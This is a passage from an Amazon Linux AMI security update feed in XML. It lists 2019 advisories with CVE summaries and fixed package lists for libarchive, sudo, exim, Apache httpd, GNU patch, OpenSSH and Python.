release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.4-21.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1308</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1308: medium priority package update for libarchive</title><issued date="2019-10-08 21:22:00" /><updated date="2019-10-09 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1000020:
libarchive version commit 5a98dcf8a86364b3c2c469c85b93647dfb139961 onwards (version v2.8.0 onwards) contains a CWE-835 Loop with Unreachable Exit Condition (&#039;Infinite Loop&#039;) vulnerability in ISO9660 parser, archive_read_support_format_iso9660.c, read_CE()/parse_rockridge() that can result in DoS by infinite loop. This attack appears to be exploitable via the victim opening a specially crafted ISO9660 file.
99999:
CVE-2019-1000020 libarchive: Infinite recursion in archive_read_support_format_iso9660.c resulting in denial of service
CVE-2019-1000019:
libarchive version commit bf9aec176c6748f0ee7a678c5f9f9555b9a757c1 onwards (release v3.0.2 onwards) contains a CWE-125 Out-of-bounds Read vulnerability in 7zip decompression, archive_read_support_format_7zip.c, header_bytes() that can result in a crash (denial of service). This attack appears to be exploitable via the victim opening a specially crafted 7zip file.
99999:
CVE-2019-1000019 libarchive: Out of bounds read in archive_read_support_format_7zip.c resulting in a denial of service
CVE-2018-1000878:
libarchive version commit 416694915449219d505531b1096384f3237dd6cc onwards (release v3.1.0 onwards) contains a CWE-416 Use After Free vulnerability in the RAR decoder, libarchive/archive_read_support_format_rar.c, that can result in a crash/DoS; it is unknown if RCE is possible. This attack appears to be exploitable when the victim opens a specially crafted RAR archive.
99999:
CVE-2018-1000878 libarchive: Use after free in RAR decoder resulting in a denial of service
CVE-2018-1000877:
libarchive version commit 416694915449219d505531b1096384f3237dd6cc onwards (release v3.1.0 onwards) contains a CWE-415 Double Free vulnerability in the RAR decoder - libarchive/archive_read_support_format_rar.c, parse_codes(), realloc(rar-&gt;lzss.window, new_size) with new_size = 0 - that can result in a crash/DoS. This attack appears to be exploitable when the victim opens a specially crafted RAR archive.
99999:
CVE-2018-1000877 libarchive: Double free in RAR decoder resulting in a denial of service
CVE-2017-14503:
libarchive 3.3.2 suffers from an out-of-bounds read within lha_read_data_none() in archive_read_support_format_lha.c when extracting a specially crafted lha archive, related to lha_crc16.
99999:
CVE-2017-14503 libarchive: Out-of-bounds read in lha_read_data_none
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14503" title="" id="CVE-2017-14503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000877" title="" id="CVE-2018-1000877" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000878" title="" id="CVE-2018-1000878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1000019" title="" id="CVE-2019-1000019" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1000020" title="" id="CVE-2019-1000020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bsdcpio" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdcpio-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-devel-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-debuginfo-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="bsdtar" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdtar-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/bsdcpio-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="libarchive" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="12.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/libarchive-debuginfo-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="bsdtar" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/bsdtar-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-devel-3.1.2-12.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1309</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1309: important priority package update for sudo</title><issued date="2019-10-12 15:49:00" /><updated date="2019-10-14 17:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14287:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287" title="" id="CVE-2019-14287" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-29.28.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-29.28.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-29.28.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-29.28.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-29.28.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-29.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1310</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1310: critical priority package update for exim</title><issued date="2019-10-18 23:22:00" /><updated date="2019-10-24 21:31:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16928:
Exim 4.92 through 4.92.2 allows remote code execution, a different vulnerability than CVE-2019-15846. There is a heap-based buffer overflow in string_vformat in string.c involving a long EHLO command.
99999:
CVE-2019-16928 exim: remotely triggerable buffer overflow in string_vformat()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16928" title="" id="CVE-2019-16928" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-debuginfo" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-mon-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1311</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1311: medium priority package update for httpd24</title><issued date="2019-10-18 23:22:00" /><updated date="2019-10-24 21:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9517:
Some HTTP/2 implementations are vulnerable to unconstrained internal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.
99999:
CVE-2019-9517 HTTP/2: request for large response leads to denial of service
CVE-2019-10098:
A vulnerability was discovered in Apache httpd, in mod_rewrite. Certain self-referential mod_rewrite rules could be fooled by encoded newlines, causing them to redirect to an unexpected location. An attacker could abuse this flaw in a phishing attack or as part of a client-side attack on browsers.
99999:
CVE-2019-10098 httpd: mod_rewrite potential open redirect
CVE-2019-10097:
A vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the &quot;PROXY&quot; protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences.

This issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.
99999:
CVE-2019-10097 httpd: null-pointer dereference in mod_remoteip
CVE-2019-10092:
A cross-site scripting vulnerability was found in Apache httpd, affecting the mod_proxy error page. Under certain circumstances, a crafted link could inject content into the HTML displayed in the error page, potentially leading to client-side exploitation.
99999:
CVE-2019-10092 httpd: limited cross-site scripting in mod_proxy error page
CVE-2019-10082:
A read-after-free vulnerability was discovered in Apache httpd, in mod_http2. A specially crafted http/2 client session could cause the server to read memory that was previously freed during connection shutdown, potentially leading to a crash.
99999:
CVE-2019-10082 httpd: read-after-free in h2 connection shutdown
CVE-2019-10081:
A vulnerability was found in Apache httpd, in mod_http2. Under certain circumstances, HTTP/2 early pushes could lead to memory corruption, causing a server to crash.
99999:
CVE-2019-10081 httpd: memory corruption on early pushes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10081" title="" id="CVE-2019-10081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10082" title="" id="CVE-2019-10082" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10092" title="" id="CVE-2019-10092" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10097" title="" id="CVE-2019-10097" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10098" title="" id="CVE-2019-10098" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9517" title="" id="CVE-2019-9517" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.41" release="1.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.41" release="1.88.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-devel-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.41" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.41-1.88.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.41" release="1.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.41" release="1.88.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.41" release="1.88.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.41-1.88.amzn1.i686.rpm</filename></package><package 
name="mod24_session" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.41-1.88.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1312</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1312: important priority package update for patch</title><issued date="2019-10-18 23:22:00" /><updated date="2019-11-07 00:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13638:
GNU patch through 2.7.6 is vulnerable to OS shell command injection that can be exploited by opening a crafted patch file that contains an ed style diff payload with shell metacharacters. The ed editor does not need to be present on the vulnerable system. This is different from CVE-2018-1000156.
99999:
CVE-2019-13638 patch: OS shell command injection when processing crafted patch files
CVE-2018-6952:
A double-free flaw was found in the way the patch utility processed patch files. An attacker could potentially use this flaw to crash the patch utility by tricking it into processing crafted patches.
99999:
CVE-2018-6952 patch: Double free of memory in pch.c:another_hunk() causes a crash
CVE-2018-20969:
do_ed_script in pch.c in GNU patch through 2.7.6 does not block strings beginning with a ! character. NOTE: this is the same commit as for CVE-2019-13638, but the ! syntax is specific to ed, and is unrelated to a shell metacharacter.
99999:
CVE-2018-20969 patch: do_ed_script in pch.c does not block strings beginning with a ! character
CVE-2016-10713:
A heap-based out-of-bounds read flaw was found in the way the patch utility parsed patch files. An attacker could potentially use this flaw to crash the patch utility by tricking it into processing crafted patch files.
99999:
CVE-2016-10713 patch: Out-of-bounds access in pch_write_line function in pch.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10713" title="" id="CVE-2016-10713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20969" title="" id="CVE-2018-20969" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6952" title="" id="CVE-2018-6952" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13638" title="" id="CVE-2019-13638" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="patch" version="2.7.1" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-2.7.1-12.14.amzn1.x86_64.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-debuginfo-2.7.1-12.14.amzn1.x86_64.rpm</filename></package><package name="patch" version="2.7.1" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/patch-2.7.1-12.14.amzn1.i686.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/patch-debuginfo-2.7.1-12.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1313</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1313: medium priority package update for openssh</title><issued date="2019-10-28 17:02:00" /><updated date="2019-10-30 20:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-6111:
An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).
1666127:
CVE-2019-6111 openssh: Improper validation of object names allows malicious server to overwrite files via scp client
CVE-2019-6109:
An issue was discovered in OpenSSH 7.9. Due to missing character encoding in the progress display, a malicious server (or Man-in-The-Middle attacker) can employ crafted object names to manipulate the client output, e.g., by using ANSI control codes to hide additional files being transferred. This affects refresh_progress_meter() in progressmeter.c.
1666119:
CVE-2019-6109 openssh: Missing character encoding in progress display allows for spoofing of scp client output
CVE-2018-20685:
In OpenSSH 7.9, scp.c in the scp client allows remote SSH servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side.
1665785:
CVE-2018-20685 openssh: scp client improper directory name validation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20685" title="" id="CVE-2018-20685" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6109" title="" id="CVE-2019-6109" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111" title="" id="CVE-2019-6111" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="21.73.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-server-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.21.73.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.21.73.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-21.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1314</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1314: medium priority package update for python27 python34 python35 python36</title><issued date="2019-10-28 17:10:00" /><updated date="2019-10-30 20:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16056:
An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally.
99999:
CVE-2019-16056 python: email.utils.parseaddr wrongly parses email addresses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16056" title="" id="CVE-2019-16056" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-libs" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34" 
version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/python35-devel-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.130.amzn1" epoch="0" 
